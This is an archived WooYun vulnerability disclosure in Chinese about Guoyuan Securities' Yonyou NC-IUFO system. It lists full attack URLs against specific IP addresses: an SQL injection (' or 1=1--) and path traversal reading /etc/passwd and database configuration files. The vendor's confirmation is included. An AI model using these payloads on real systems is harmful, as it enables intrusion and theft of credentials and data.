乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-04-05: 细节已通知厂商并且等待厂商处理中 2016-04-08: 厂商已经确认,细节仅向厂商公开 2016-04-18: 细节向核心白帽子及相关领域专家公开 2016-04-28: 细节向普通白帽子公开 2016-05-08: 细节向实习白帽子公开 2016-05-23: 细节向公众公开
RT
以为不是国元 看了这个ip https://60.173.222.35/才知道哦
案例 WooYun: 用友NC-IUFO报表系统部分安全问题(影响多个大客户)
后台:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction
用户信息泄露:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID=
SQL注入:http://60.173.222.34:8000/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=executedata:TreeSelectedID=&TableSelectedID=&refSearchProp=unit_code&refSearchPropLbl=%E5%8D%95%E4%BD%8D%E7%BC%96%E7%A0%81&refSearchOper=%3D&refSearchOperLbl=%E7%AD%89%E4%BA%8E&refSearchValue=' or 1=1--
任意文件读取:http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../../../etc/passwd
数据量链接信息:http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../conf/server.xml
任意文件下载也是一样罗http://60.173.222.34:8000/NCFindWeb?service=IPreAlertConfigService&filename=../../root.sh
你懂的额
危害等级:中
漏洞Rank:10
确认时间:2016-04-08 09:34
非常感谢您对国元证券的关注和支持,我们将尽快对漏洞进行修复和处理!
暂无